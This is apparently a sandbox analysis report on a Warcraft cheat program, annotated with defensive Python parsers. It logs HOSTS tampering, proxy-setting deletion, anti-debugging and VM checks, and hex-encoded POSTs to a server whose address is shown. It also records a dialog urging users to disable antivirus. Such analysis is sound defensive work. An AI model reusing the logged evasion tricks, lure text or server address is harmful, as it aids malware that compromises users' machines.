VirSCAN
File information
Security score: 55
Basic information
MD5: ae921fef07e12c2dad2ce2709c0a13d1
File type: zip
Publisher:
Version:
Packer/compiler:
Contained file: 444.exe / 0a7093e4b55c6b9db19699fe18f03656 / EXE
Key behaviors
Behavior: Set special folder attributes
Details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior: Read CPU time-stamp counter directly (rdtsc; 64-bit value returned in EDX:EAX)
Details: EAX = 0x4ebb2c5b, EDX = 0x000000ba
EAX = 0x4ebb2ca7, EDX = 0x000000ba
EAX = 0x5142fc30, EDX = 0x000000ba
EAX = 0x5142fc7c, EDX = 0x000000ba
EAX = 0x5142fcc8, EDX = 0x000000ba
EAX = 0x5142fd14, EDX = 0x000000ba
EAX = 0x5142fd60, EDX = 0x000000ba
EAX = 0x5142fdac, EDX = 0x000000ba
EAX = 0x5142fdf8, EDX = 0x000000ba
EAX = 0x5142fe44, EDX = 0x000000ba
Behavior: Read tick count (GetTickCount), logged with the accompanying Sleep length
Details: TickCount = 231556, SleepMilliseconds = 5041.
TickCount = 231603, SleepMilliseconds = 5041.
TickCount = 231619, SleepMilliseconds = 5041.
TickCount = 231650, SleepMilliseconds = 5041.
TickCount = 231666, SleepMilliseconds = 5041.
TickCount = 231697, SleepMilliseconds = 5041.
TickCount = 231744, SleepMilliseconds = 5041.
TickCount = 231806, SleepMilliseconds = 5041.
TickCount = 231900, SleepMilliseconds = 5041.
TickCount = 232041, SleepMilliseconds = 5041.
TickCount = 232056, SleepMilliseconds = 5041.
TickCount = 232072, SleepMilliseconds = 5041.
TickCount = 232087, SleepMilliseconds = 5041.
TickCount = 232103, SleepMilliseconds = 5041.
TickCount = 232134, SleepMilliseconds = 5041.
Behavior: Modify HOSTS file
Details: C:\WINDOWS\system32\drivers\etc\hosts ---> Offset = 0
Behavior: Rename, then delete HOSTS file
Details: C:\WINDOWS\system32\drivers\etc\hosts
Behavior: Modify sensitive system file
Details: C:\WINDOWS\system32\drivers\etc\lmhosts.sam ---> Offset = 0
Behavior: Direct call to critical system API (by system-call index, with calling address)
Details: Index = 0x0000009A, Name: NtQueryInformationProcess, Instruction Address = 0x0184F3E6
Index = 0x000000E5, Name: NtSetInformationThread, Instruction Address = 0x0184F3E6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046C3D6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CE33
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CFF6
Behavior: VMware special-instruction VM detection
Details: N/A
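The rdtsc and GetTickCount entries above are the sample's timing checks, and the report logs each tick read together with the Sleep length that accompanied it. Together with IsDebuggerPresent, SE_DEBUG_PRIVILEGE and the NtQueryInformationProcess/NtSetInformationThread calls issued by index from 0x0184F3E6 (outside the 0x00400000 image whose base the Afx:400000 window class discloses), they form the sample's anti-analysis layer. The following example was added for this page and is not part of the VirSCAN report: it parses the logged values and computes what a sandbox-aware sample computes itself, the 64-bit TSC rebuilt from EDX:EAX and the tick advance between consecutive GetTickCount reads compared with the 5041 ms requested from Sleep. The data lines are copied from the report; the 90% tolerance is this example's own choice.

```python
import re
from collections import Counter

# Entries copied verbatim from the "Read CPU time-stamp counter" and
# "Read tick count" items of the VirSCAN report (page data, not constructed).
RDTSC_LINES = """\
EAX = 0x4ebb2c5b, EDX = 0x000000ba
EAX = 0x4ebb2ca7, EDX = 0x000000ba
EAX = 0x5142fc30, EDX = 0x000000ba
EAX = 0x5142fc7c, EDX = 0x000000ba
EAX = 0x5142fcc8, EDX = 0x000000ba
EAX = 0x5142fd14, EDX = 0x000000ba
EAX = 0x5142fd60, EDX = 0x000000ba
EAX = 0x5142fdac, EDX = 0x000000ba
EAX = 0x5142fdf8, EDX = 0x000000ba
EAX = 0x5142fe44, EDX = 0x000000ba
""".splitlines()

TICK_LINES = """\
TickCount = 231556, SleepMilliseconds = 5041.
TickCount = 231603, SleepMilliseconds = 5041.
TickCount = 231619, SleepMilliseconds = 5041.
TickCount = 231650, SleepMilliseconds = 5041.
TickCount = 231666, SleepMilliseconds = 5041.
TickCount = 231697, SleepMilliseconds = 5041.
TickCount = 231744, SleepMilliseconds = 5041.
TickCount = 231806, SleepMilliseconds = 5041.
TickCount = 231900, SleepMilliseconds = 5041.
TickCount = 232041, SleepMilliseconds = 5041.
TickCount = 232056, SleepMilliseconds = 5041.
TickCount = 232072, SleepMilliseconds = 5041.
TickCount = 232087, SleepMilliseconds = 5041.
TickCount = 232103, SleepMilliseconds = 5041.
TickCount = 232134, SleepMilliseconds = 5041.
""".splitlines()

RDTSC_RE = re.compile(r"EAX = 0x([0-9a-fA-F]+), EDX = 0x([0-9a-fA-F]+)")
TICK_RE = re.compile(r"TickCount = (\d+), SleepMilliseconds = (\d+)")


def parse_rdtsc(lines):
    """RDTSC returns the 64-bit TSC split across EDX:EAX; rebuild the full value."""
    out = []
    for line in lines:
        m = RDTSC_RE.search(line)
        if m:
            eax, edx = int(m.group(1), 16), int(m.group(2), 16)
            out.append((edx << 32) | eax)
    return out


def parse_ticks(lines):
    """Return [(tick_count_ms, requested_sleep_ms), ...] in logged order."""
    out = []
    for line in lines:
        m = TICK_RE.search(line)
        if m:
            out.append((int(m.group(1)), int(m.group(2))))
    return out


def deltas(values):
    return [b - a for a, b in zip(values, values[1:])]


def rdtsc_report(lines):
    """Distance in TSC ticks between consecutive reads. The classic rdtsc check
    compares two back-to-back reads against a threshold: a read that was
    single-stepped or broke into a debugger costs far more than a few hundred
    cycles. A hooked or emulated rdtsc tends to return a constant spacing."""
    d = deltas(parse_rdtsc(lines))
    value, count = Counter(d).most_common(1)[0]
    return {"deltas": d, "most_common": (value, count), "min": min(d)}


def tick_report(lines, tolerance=0.9):
    """If each logged GetTickCount read followed the logged Sleep, a host that
    really slept would advance by at least tolerance * requested between reads.
    Reads that advanced less than that are counted as skipped sleeps."""
    samples = parse_ticks(lines)
    ticks = [t for t, _ in samples]
    advances = deltas(ticks)
    requested = [s for _, s in samples][1:]
    honoured = [adv >= tolerance * req for adv, req in zip(advances, requested)]
    return {
        "advances_ms": advances,
        "requested_ms": requested,
        "sleep_honoured": all(honoured),
        "skipped": sum(1 for h in honoured if not h),
        "span_ms": ticks[-1] - ticks[0] if ticks else 0,
    }
```

Run on the report's own values, the TSC reads are 0x4c (76) ticks apart in eight of nine cases, far below any single-step threshold, and that uniform spacing is what a hooked rdtsc returns rather than a free-running counter. The tick counter advanced 15 to 141 ms between reads, 578 ms across all fifteen, although each read is paired with a 5041 ms Sleep; that is exactly the pattern a sample looking for an accelerated Sleep would detect, and it is consistent with the sandbox shortening sleeps. The report does not state that every read bracketed a Sleep, so treat this as indicative rather than proof.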
Process behavior
Behavior: Create local thread
Details: TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 2976, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3020, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3024, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3028, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3032, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3036, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3056, StartAddress = 0042DF7B, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3060, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3064, StartAddress = 4AEA7456, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3068, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3072, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3524, StartAddress = 0042DF6F, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3536, StartAddress = 0044C972, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3540, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3544, StartAddress = 0040A997, Parameter = 00359D9D
Behavior: Enumerate processes
Details: N/A
File behavior
Behavior: Create file
Details: C:\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\lmhosts.sam
C:\Documents and Settings\Administrator\Local Settings\Temp\okyes.wav
C:\Documents and Settings\Administrator\My Documents\8c6d3e47
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\dzx_test[1].php
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\pojie[1].php
Behavior: Set special folder attributes
Details: the same five Internet Explorer cache, history and cookie folders listed under Key behaviors.
Behavior: Overwrite existing file
Details: C:\Documents and Settings\Administrator\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
Behavior: Search for files
Details: FileName = C:\WINDOWS\system32\\temp\*.*
FileName = C:\Documents and Settings\Administrator\My Documents\8c6d3e47
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS\system32\Ras\*.pbk
FileName = C:\Documents and Settings\Administrator\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
Behavior: Modify HOSTS file
Details: C:\WINDOWS\system32\drivers\etc\hosts ---> Offset = 0
Behavior: Delete file
Details: C:\WINDOWS\system32\drivers\etc\lmhosts.sam
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\dzx_test[1].php
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\pojie[1].php
Behavior: Rename, then delete HOSTS file
Details: C:\WINDOWS\system32\drivers\etc\hosts
Behavior: Rename file
Details: C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe_7zdump\444.exe ---> C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe_7zdump\14IYW5KH.exe
Behavior: Modify sensitive system file
Details: C:\WINDOWS\system32\drivers\etc\lmhosts.sam ---> Offset = 0
Behavior: Modify file contents
Details: C:\Documents and Settings\Administrator\Local Settings\Temp\okyes.wav ---> Offset = 0
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 0
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 598
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 617
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 655
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 662
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 669
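The file entries above record the HOSTS file rewritten from offset 0 and then replaced by rename-and-delete (so the file on disk is a new object with new timestamps), a new lmhosts.sam, and, in the registry section further down, the per-user ProxyServer, ProxyOverride and AutoConfigURL values deleted. The report does not include what was written. The example below was added for this page (it is neither VirSCAN's code nor the sample author's) and is the hosts audit a responder would run on the rewritten file: it parses hosts syntax, ignores the stock localhost mappings, and classifies every other entry as sinkholed (pointing at loopback or 0.0.0.0, the usual way to block update or security-vendor domains) or redirected (pointing at some other address). The sample hosts content, its hostnames and the 203.0.113.7 address are constructed for the example.

```python
import ipaddress

# Constructed sample: the stock Windows hosts header plus three added lines of
# the kind a hosts rewrite leaves behind. Not the contents written by 444.exe,
# which the report does not show.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
0.0.0.0         update.example-av.test      # sinkholed
127.0.0.1       www.example-vendor.test
203.0.113.7     www.example-bank.test       # redirected (TEST-NET-3 address)
"""

# Mappings present in a clean file; anything else is worth a look.
STOCK_ENTRIES = {("127.0.0.1", "localhost"), ("::1", "localhost")}


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping, skipping comments and
    blanks. A malformed address field is yielded with ip=None rather than
    dropped: a hand-edited hosts file is itself a signal."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            yield line_no, None, body
            continue
        for name in fields[1:]:
            yield line_no, ip, name.lower()


def classify(ip, name):
    if ip is None:
        return "malformed"
    if (ip, name) in STOCK_ENTRIES:
        return "stock"
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback or addr.is_unspecified:
        return "sinkholed"   # name can no longer reach its real host
    return "redirected"      # name silently points at another machine


def audit_hosts(text):
    """Return (line_no, ip, name, verdict) for every non-stock mapping."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        verdict = classify(ip, name)
        if verdict != "stock":
            findings.append((line_no, ip, name, verdict))
    return findings
```

On the constructed sample the audit returns the three added lines and nothing else. On a real host, pair it with the file's creation time: because the sample replaced HOSTS by rename, the creation timestamp of the current file dates the tampering, and the deleted proxy values explain why traffic from the sample's WinINet sessions goes straight to port 80 rather than through any configured inspecting proxy.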
Network behavior
Behavior: Connect to specified host
Details: InternetConnectA: ServerName = **.209.123.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.209.123.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0008, hConnect = 0x00cc000c, Flags = 0x00000000
Behavior: Open HTTP session
Details: InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), hSession = 0x00cc0004
InternetOpenA: UserAgent: Agent251850, hSession = 0x00cc0008
InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), hSession = 0x00cc0008
Behavior: Establish socket connection to specified address
Details: IP: **.209.123.**:80, SOCKET = 0x00000354
IP: **.209.123.**:80, SOCKET = 0x0000021c
IP: **.209.123.**:80, SOCKET = 0x00000344
IP: **.209.123.**:80, SOCKET = 0x00000360
IP: **.209.123.**:80, SOCKET = 0x00000378
IP: **.209.123.**:80, SOCKET = 0x00000394
Behavior: Read from network file handle
Details: hFile = 0x00cc000c, BytesToRead =102400, BytesRead = 102400.
hFile = 0x00cc0010, BytesToRead =512, BytesRead = 512.
Behavior: Send HTTP request (each request flattened onto one line by the report)
Details: GET /pojie.txt HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: */* Host: **.209.123.** Cache-Control: no-cache
POST /config/dzx_test.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/dzx_test.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 15 User-Agent: Agent251850 Host: **.209.123.** Cache-Control: no-cache DATA=FCD1576F02
POST /config/pojie.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/pojie.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 75 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: **.209.123.** Cache-Control: no-cache DATA=E1C7573918D8E7C899240C99EDCEAC257EBDA3FF84904C142835150859B240A6A7795A
Behavior: Open HTTP request
Details: HttpOpenRequestA: **.209.123.**:80/pojie.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x84000000
HttpOpenRequestA: **.209.123.**:80/config/dzx_test.php, hConnect = 0x00cc000c, hRequest = 0x00cc0010, Verb: POST, Referer: , Flags = 0x80000000
HttpOpenRequestA: **.209.123.**:80/config/pojie.php, hConnect = 0x00cc000c, hRequest = 0x00cc0010, Verb: POST, Referer: , Flags = 0x80000000
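The request lines above are the most actionable part of the report. The example below was added for this page (it is not VirSCAN's code and not the sample author's) and pulls the flattened lines apart into request line, headers and body, then flags what a triage analyst would want to see: the custom `Agent251850` User-Agent of the second InternetOpenA session, the `DATA=` bodies that are plain hex whose declared Content-Length matches the body exactly (15 and 75 bytes), and the fact that the Referer headers carry the server address 210.209.123.236 that the report masks as **.209.123.** in Host and in the socket entries. The header names and the DATA= convention are taken from the page; the finding labels are this example's own.

```python
import re
from dataclasses import dataclass, field

# The three request lines copied verbatim from the "Send HTTP request" entry
# of the VirSCAN report. The report masks the server in Host as **.209.123.**
# but leaves the Referer header unmasked.
RAW_REQUESTS = [
    "GET /pojie.txt HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: */* Host: **.209.123.** Cache-Control: no-cache",
    "POST /config/dzx_test.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/dzx_test.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 15 User-Agent: Agent251850 Host: **.209.123.** Cache-Control: no-cache DATA=FCD1576F02",
    "POST /config/pojie.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/pojie.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 75 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: **.209.123.** Cache-Control: no-cache DATA=E1C7573918D8E7C899240C99EDCEAC257EBDA3FF84904C142835150859B240A6A7795A",
]

REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]\s*")
HEADER_NAME = re.compile(r"(?:^|\s)([A-Za-z][A-Za-z-]*): ")   # "Name: " at a word start
FORM_BODY = re.compile(r"\s(DATA=\S+)$")                     # trailing form body
HEX_BODY = re.compile(r"^DATA=[0-9A-Fa-f]+$")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    body: str
    findings: list = field(default_factory=list)


def parse_request(raw):
    """Split one flattened report line into request line, headers and body."""
    m = REQUEST_LINE.match(raw)
    if not m:
        raise ValueError("not a request line: " + raw[:40])
    rest, body = raw[m.end():], ""
    b = FORM_BODY.search(rest)
    if b:
        body, rest = b.group(1), rest[:b.start()]
    marks = list(HEADER_NAME.finditer(rest))
    headers = {}
    for i, h in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(rest)
        headers[h.group(1)] = rest[h.end():end].strip()
    return Request(m.group(1), m.group(2), headers, body)


def analyse(raw_lines):
    """Parse every line and attach triage findings to each request."""
    reqs = []
    for raw in raw_lines:
        r = parse_request(raw)
        if not r.headers.get("User-Agent", "").startswith("Mozilla/"):
            r.findings.append("non-browser-ua")
        if r.body:
            if HEX_BODY.match(r.body):
                r.findings.append("hex-body")
            declared = r.headers.get("Content-Length")
            if declared is not None and int(declared) != len(r.body):
                r.findings.append("content-length-mismatch")
        if "*" in r.headers.get("Host", "") and IPV4.search(r.headers.get("Referer", "")):
            r.findings.append("referer-discloses-masked-host")
        reqs.append(r)
    return reqs


def referer_ips(reqs):
    """Unmasked IPv4 addresses recoverable from Referer headers."""
    return sorted({ip for r in reqs for ip in IPV4.findall(r.headers.get("Referer", ""))})
```

The first request (GET /pojie.txt with a browser-like User-Agent, answered with 102400 bytes according to the read entry above) carries no findings; both POSTs carry `hex-body` and `referer-discloses-masked-host`, and the dzx_test.php POST additionally `non-browser-ua`. The Content-Length values check out, so the bodies as logged are complete; what the hex encodes is not recoverable from the report.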
Registry behavior
Behavior: Modify registry
Details: \REGISTRY\MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name
\REGISTRY\MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior: Delete registry value
Details: \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior: Direct call to critical system API (by system-call index, with calling address)
Details: the same five entries (NtQueryInformationProcess, NtSetInformationThread, NtAllocateVirtualMemory x3) listed under Key behaviors.
Behavior: Check whether being debugged
Details: IsDebuggerPresent
Behavior: Create mutex
Details: RasPbFile
CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
DDrawWindowListMutex
DDrawDriverObjectListMutex
__DDrawExclMode__
__DDrawCheckExclMode__
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
Behavior: Create event object
Details: EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = MSCTF.SendReceive.Event.IGL.IC
EventName = MSCTF.SendReceiveConection.Event.IGL.IC
EventName = 111882112850000456456634
Behavior: Open event
Details: HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
MSCTF.SendReceiveConection.Event.IOH.IC
MSCTF.SendReceive.Event.IOH.IC
111882112850000456456634
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000011
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000011
Behavior: Open mutex
Details: RasPbFile
ShimCacheMutex
DBWinMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\!IETld!Mutex
Behavior: Find specified window
Details: NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Behavior: Enumerate windows
Details: N/A
Behavior: Read tick count (GetTickCount)
Details: the same fifteen TickCount/SleepMilliseconds entries listed under Key behaviors.
Behavior: Adjust process token privileges
Details: SE_DEBUG_PRIVILEGE
Behavior: Window information
Details: Pid = 2916, Hwnd=0x1039a, Text = "Please exit all antivirus software, including the Safe Box (保险箱); otherwise the cheat will not run properly. The cheat will never contain any trojan or virus." (original: 请退出所有杀毒软件包括保险箱,否则外挂将无法正常运行。外挂绝不会加入任何木马病毒), ClassName = Syser MsgBox.
Pid = 2916, Hwnd=0x10466, Text = OK (确定), ClassName = Button.
Pid = 2916, Hwnd=0x10468, Text = "The program cannot connect to the server; please contact the author, QQ 952203029" (original: 程序无法与服务器建立连接,请与作者联系 QQ 952203029), ClassName = Static.
Pid = 2916, Hwnd=0x70462, Text = Info: (信息:), ClassName = #32770.
Pid = 2916, Hwnd=0x1047c, Text = Point-card window tab (点卡窗口标签), ClassName = Afx:400000:b:10011:1900015:0.
Pid = 2916, Hwnd=0x2039a, Text = , ClassName = WTWindow.
Behavior: Direct physical device access
Details: \??\PhysicalDrive0
Behavior: Call Sleep
Details: [1]: MilliSeconds = 5041.
[2]: MilliSeconds = 5041.
[3]: MilliSeconds = 5041.
[4]: MilliSeconds = 5041.
[5]: MilliSeconds = 5041.
[6]: MilliSeconds = 5041.
[7]: MilliSeconds = 1000.
[8]: MilliSeconds = 100.
[9]: MilliSeconds = 1000.
[10]: MilliSeconds = 100.
Behavior: Hide specified windows (button labels of the cheat's own UI; translation in parentheses)
Details: [Window,Class] = [迷雾移除(小),Button]  (Fog removal, small)
[Window,Class] = [迷雾移除(大),Button]  (Fog removal, large)
[Window,Class] = [魔兽错误点我imba,Button]  (Warcraft error? click me, imba)
[Window,Class] = [小地图显示單位(AH),Button]  (Show units on minimap, AH)
[Window,Class] = [地图防检测/防错误,Button]  (Map anti-detection / anti-error)
[Window,Class] = [读秒取消,Button]  (Cancel countdown)
[Window,Class] = [敌军头像,Button]  (Enemy portraits)
[Window,Class] = [神符显示,Button]  (Show runes)
[Window,Class] = [敌军血条,Button]  (Enemy health bars)
[Window,Class] = [秒开游戏,Button]  (Instant game launch)
[Window,Class] = [盟军血条,Button]  (Ally health bars)
[Window,Class] = [技能显示,Button]  (Show abilities)
[Window,Class] = [显资源条,Button]  (Show resource bar)
[Window,Class] = [资源面板,Button]  (Resource panel)
[Window,Class] = [交换物品,Button]  (Swap items)
Behavior: Read CPU time-stamp counter directly (rdtsc)
Details: the same ten EDX:EAX readings listed under Key behaviors.
Behavior: VMware special-instruction VM detection
Details: N/A
Runtime screenshot